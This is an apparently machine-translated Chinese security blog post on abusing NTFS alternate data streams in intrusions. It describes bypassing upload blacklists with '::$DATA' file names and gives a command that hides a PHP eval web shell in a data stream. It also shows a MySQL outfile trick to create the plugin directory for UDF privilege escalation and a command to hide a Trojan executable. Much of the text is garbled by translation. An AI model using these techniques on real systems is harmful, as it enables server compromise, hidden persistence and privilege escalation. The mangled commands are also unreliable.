For a brief description of ads, see http://www.xfocus.net/articles/200212/466.html
We can see that ads have been concerned by some security personnel for a long time, and have also put forward some classic exploits, such as hiding files, hiding Webshell (http://blog.csdn.net/lake2/article/details/269659), With this explosion of IIS permissions bypass, we again tested the use of ads in the infiltration, and found some more interesting phenomenon.
1 Classic IIS Directory access permissions bypass:
See: http://www.exploit-db.com/exploits/19033/
Note: The permissions here are the NTFS directory properties permissions, not the background direct bypass. Don't get me wrong.
2 Bypass blacklist verification
In the test we found that if the uploaded file name is: test.php:: $DATA, the server will generate a test.php file, where the content and the content of the uploaded file is the same, and is parsed. Suppose we need to upload the contents of the file: <?php phpinfo ();? > Below is the phenomenon that uploads are going to occur:
Uploaded file name server surface phenomenon generated files content
Test.php:a.jpg Generating test.php Empty
test.php:: $DATA generate test.php <?php phpinfo ();? >
test.php:: $INDEX _allocation Generate test.php folder
test.php:: $DATA \0.jpg generate 0.jpg <?php phpinfo ();? >
test.php:: $DATA \aaa.jpg generate Aaa.jpg <?php phpinfo ();? >
PS: Upload test.php:a.jpg is actually on the server normally generated a data stream file, can be Notepad test.php:a.jpg view content, and test.php is empty is normal.
According to the second phenomenon, we can bypass some blacklist verification.
I tried to truncate the back when I added the test, but found that Windows ignored the "/" "\" symbols before the two symbols, only the string after the symbol. (because Windows takes \/As a directory, and uploads only know the file name caused)
3 use in hidden Webshell:
Method: Echo A data stream file on the server, such as index.php is a normal Web page file, we can do this: Echo ^<?php @eval (Request[cmd])?^> > index.php: Hidden.jpg
This creates an invisible shell hidden.jpg, the regular file manager, the Type command, the dir command, and the del command find no hidden.jpg. We can include this ads file in another normal file, <?php include (' index.php:hidden.jpg '), and this way, we can parse our sentence normally.
4 The use of the UDF to raise right
UDF Right tips: If the database user has insert and delete permissions on the database MySQL (note that the default library MySQL is in the database), you can create a load custom function. And because MySQL is running on the Windows host with system privileges, we can execute commands with system permissions by using custom functions.
Mysql more than 5.1 (now all 5.6 version, estimated that the old version is not common. ), when loading a DLL for a custom function, the directory must be the lib\plugin\ directory under the MySQL directory. Direct import C:\windows\system32 This directory is not loaded DLL, there is no way to creat function. But sadly the version after MySQL 5.1 is installed by default does not exist in the Lib\plugin directory, unless you install the full version (the official kind of more than 200 m).
There are some situations, such as: You get Webshell, but Webshell permissions are limited to death, there is no way to create a new Lib\plugin directory, or you do not have Webshell, only a MySQL weak password (http:// blog.sina.com.cn/s/blog_6ca7b58101013kt4.html). The previous estimate is that only give up, but using ads we can bypass this limit.
Demo:
select ' xxx ' into outfile ' d:\\mysql\\lib:: $INDEX _allocation ';
A Lib directory will be generated in the MySQL directory
5 Using Ads to hide the Trojan
Hide well, execute command directly inside cmd: type Muma.ext test.txt:muma.exe
In this way, the Trojan is written into the test.txt data stream. But want to run the words also have to rely on other tools, WinRAR is a, specific methods Baidu Encyclopedia has, but the encyclopedia of the letter, success, need to use the type command to write binary executable file in.
WinRAR self-extracting Trojan I still feel not reliable, after all, suffix is exe, if the target even this can not be determined, it is not as good as direct hair muma.exe. So I didn't do much research on this use.
Note: If the data stream is an executable file, it needs to be Win7 under the Win XP and 2003 environment when it is called with the start command.
Related Information Download: ntfs-ads
Some problems with ads in NTFS